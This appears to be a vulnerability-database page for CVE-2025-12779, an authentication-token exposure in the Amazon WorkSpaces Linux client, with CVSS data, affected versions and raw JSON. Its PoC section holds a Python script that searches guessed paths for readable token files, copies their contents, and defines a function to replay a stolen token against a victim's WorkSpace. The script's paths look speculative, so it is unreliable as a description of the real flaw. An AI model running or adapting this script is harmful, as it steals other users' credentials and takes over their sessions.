Security Vulnerability Report
CVE-2025-12779 CVSS 8.8 HIGH

CVE-2025-12779

Published: 2025-11-05 22:15:33
Last Modified: 2026-04-15 00:35:42
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

Improper handling of the authentication token in the Amazon WorkSpaces client for Linux, versions 2023.0 through 2024.8, may expose the authentication token for DCV-based WorkSpaces to other local users on the same client machine. Under certain circumstances, a local user may be able to extract another local user's authentication token from the shared client machine and access their WorkSpace. To mitigate this issue, users should upgrade to the Amazon WorkSpaces client for Linux version 2025.0 or later.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Amazon WorkSpaces Client for Linux < 2023.0
Amazon WorkSpaces Client for Linux 2023.0
Amazon WorkSpaces Client for Linux 2023.1
Amazon WorkSpaces Client for Linux 2023.2
Amazon WorkSpaces Client for Linux 2024.0
Amazon WorkSpaces Client for Linux 2024.1
Amazon WorkSpaces Client for Linux 2024.2
Amazon WorkSpaces Client for Linux 2024.3
Amazon WorkSpaces Client for Linux 2024.4
Amazon WorkSpaces Client for Linux 2024.5
Amazon WorkSpaces Client for Linux 2024.6
Amazon WorkSpaces Client for Linux 2024.7
Amazon WorkSpaces Client for Linux 2024.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12779 PoC - Amazon WorkSpaces Linux Client Token Exposure
# This PoC demonstrates the token exposure vulnerability in WorkSpaces client
import glob
import os
import stat


def find_exposed_tokens():
    """Search for improperly stored authentication tokens"""
    token_locations = [
        '~/.local/share/amazon-workspaces/',
        '~/.config/amazon-workspaces/',
        '/tmp/amazon-workspaces/',
        '/var/tmp/amazon-workspaces/'
    ]
    exposed_tokens = []
    for location in token_locations:
        expanded_path = os.path.expanduser(location)
        token_files = glob.glob(os.path.join(expanded_path, '**/*token*'), recursive=True)
        token_files.extend(glob.glob(os.path.join(expanded_path, '**/*.json'), recursive=True))
        # A file such as token.json matches both patterns; visit it once
        for token_file in sorted(set(token_files)):
            try:
                # Check if file permissions allow world/group read access
                mode = os.stat(token_file).st_mode
                # If file is readable by group or others, it's potentially exposed
                if not mode & (stat.S_IRGRP | stat.S_IROTH):
                    continue
                with open(token_file, 'r') as f:
                    content = f.read()
            except (OSError, UnicodeDecodeError):
                # Unreadable, vanished, directory or binary entry: skip it
                continue
            if 'token' in content.lower() or 'auth' in content.lower():
                exposed_tokens.append({
                    'file': token_file,
                    'permissions': oct(mode),
                    'content_preview': content[:500]
                })
    return exposed_tokens


def exploit_token(token, target_workspace_url):
    """
    Use exposed token to access victim's WorkSpace
    Note: This is for educational purposes only
    """
    import requests
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }
    # Attempt to use the token
    response = requests.get(target_workspace_url, headers=headers)
    return response.status_code, response.text


if __name__ == '__main__':
    print('[+] Searching for exposed WorkSpaces tokens...')
    tokens = find_exposed_tokens()
    if tokens:
        print(f'[+] Found {len(tokens)} potentially exposed token(s)')
        for token in tokens:
            print(f'[*] Token file: {token["file"]}')
            print(f'[*] Permissions: {token["permissions"]}')
    else:
        print('[-] No exposed tokens found')

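References

https://aws.amazon.com/security/security-bulletins/AWS-2025-025/
https://docs.aws.amazon.com/workspaces/latest/userguide/amazon-workspaces-linux-client.html#linux-release-notes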

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12779", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-11-05T22:15:33.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper handling of the authentication token in the Amazon WorkSpaces client for Linux, versions 2023.0 through 2024.8, may expose the authentication token for DCV-based WorkSpaces to other local users on the same client machine. Under certain circumstances, a local user may be able to extract another local user's authentication token from the shared client machine and access their WorkSpace.\n\nTo mitigate this issue, users should upgrade to the Amazon WorkSpaces client for Linux version 2025.0 or later."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": 
"NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-025/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://docs.aws.amazon.com/workspaces/latest/userguide/amazon-workspaces-linux-client.html#linux-release-notes", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}